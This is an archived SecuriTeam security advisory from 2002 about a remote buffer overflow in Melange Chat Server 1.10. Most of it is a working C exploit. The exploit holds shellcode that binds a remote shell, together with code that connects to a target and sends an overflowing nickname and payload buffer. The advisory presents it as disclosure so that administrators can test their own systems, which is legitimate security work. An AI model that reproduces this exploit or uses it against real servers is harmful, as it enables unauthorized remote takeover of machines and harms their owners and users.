[EXPL] Melange Chat System Remote Exploit Code Released

From: support@securiteam.com
Date: 12/25/02

  • Next message: support@securiteam.com: "[UNIX] Integer Overflow in pdftops"
    From: support@securiteam.com
    To: list@securiteam.com
    Date: 25 Dec 2002 10:51:50 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Melange Chat System Remote Exploit Code Released
    ------------------------------------------------------------------------

    SUMMARY

     <http://melange.terminal.at/> Christian Walter's Melange Chat System is a
    chat client/server that provides an easy way to set up your own, power
    full chat. A remotely exploitable buffer overflow in the product allows a
    remote attacker to completely compromise the server. The following is an
    exploit code that can be used to test your own system for the mentioned
    vulnerability.

    DETAILS

    Exploit:
    /*
       Proof of Concept for Melange Chat Server 1.10
       a lame remote bof exploit by innerphobia <up2u_@hotmail.com> 12/24/02

       Credits go to:
       - iDefense Labs for the advisory
       - blink for discovering the bug
       - Irian for the shellcode

       With careful calculation it is *possible* to control even the EIP,
       not just one byte of EIP.
       There are to a few things that will happen if we use a wrong ret
    address:
       1. Seg fault / shut down.
       2. Keep on going < nothing happens >.

       Code tested on Suse 8.0 and RH 7.3
       Merry Xmas :)
    */

    #include <stdio.h>
    #include <string.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netdb.h>

    // magic numbers begin here
    #define ADDR 0xbfffd490
    #define NICKLEN 49
    #define BUFFLEN 463
    // magic numbers end

    // brutally copied from Irian's cy.c
    char evil[]=
    "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\x52\x50\xcd\x80\x43"
    "\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\x52\x50\xb0\x66\xcd\x80\x89\xe1\xb3\x04"
    "\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x89\xd9\x93\xb0\x3f\xcd\x80\x49\x79\xf9\x52"
    "\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

    int main(int argc,char **argv){
        int i,j=0,sock,port = 6666;
        char *host;
        char nick[NICKLEN],buff[BUFFLEN];
        struct hostent *htent;
        struct sockaddr_in serv_addr;
        long jump = ADDR;
        u_long *ptr = (u_long *)buff;

        if(argc>4||argc<2)
            printf("Usage : %s [hostname] [ret address in hex (0x41414141)]
    [port]\n",argv[0]),exit(1);

        host=argv[1];
        if(argc>2) sscanf(argv[2],"0x%lx",&jump);
        if(argc>3) port=atoi(argv[3]);

        if((htent = gethostbyname(argv[1])) != NULL && (sock =
    socket(AF_INET,SOCK_STREAM,0)) != -1){

            serv_addr.sin_family = AF_INET;
            memcpy((char
    *)&serv_addr.sin_addr.s_addr,htent->h_addr_list[0],htent->h_length);
            serv_addr.sin_port = htons(port);

            if(!connect(sock,(struct sockaddr
    *)&serv_addr,sizeof(serv_addr))){

                printf("Connected to %s at %d [0x%lx]\nTrying to send %d chars

    NICKNAME\n",host,port,jump,sizeof(nick)-6);

                memset(nick,'A',sizeof(nick)),memcpy(nick,"/NICK ",6);

                if(send(sock,nick,sizeof(nick),0) == -1)
                    perror("Sending nickname failed\n"),exit(1);
                sleep(1);

                for(i=0;i<sizeof(buff);i+=4) *(ptr++)=jump;
                for(i=0;i<sizeof(buff)-200-strlen(evil);i++) buff[i]=0x90;
                for(j=0;j<strlen(evil);j++) buff[i++]=evil[j];

                printf("Trying to send overflow string\n");

                if(send(sock,buff,sizeof(buff),0) == -1)
                    perror("Sending overflow failed :(\n"),exit(1);

                sleep(1);
                printf("Now try to connect to host : %s port : 26112\n",host);
                close(sock);
            }
            else printf("Can't connect to %s at %d\n",host,port),exit(1);
        }
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:up2u_@hotmail.com>
    Innerphobia.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



    Relevant Pages

    • [NT] Proxomitron Naoko Long Path Buffer Overflow/DoS
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [NT] AN HTTPD Cross-Site Scripting Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... * AN HTTPD verison 1.41d ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [EXPL] Apple Core Foundation Library "CF_CHARSET_PATH" Local Root Exploit
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [UNIX] PHP Gift Registry SQL Injection
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)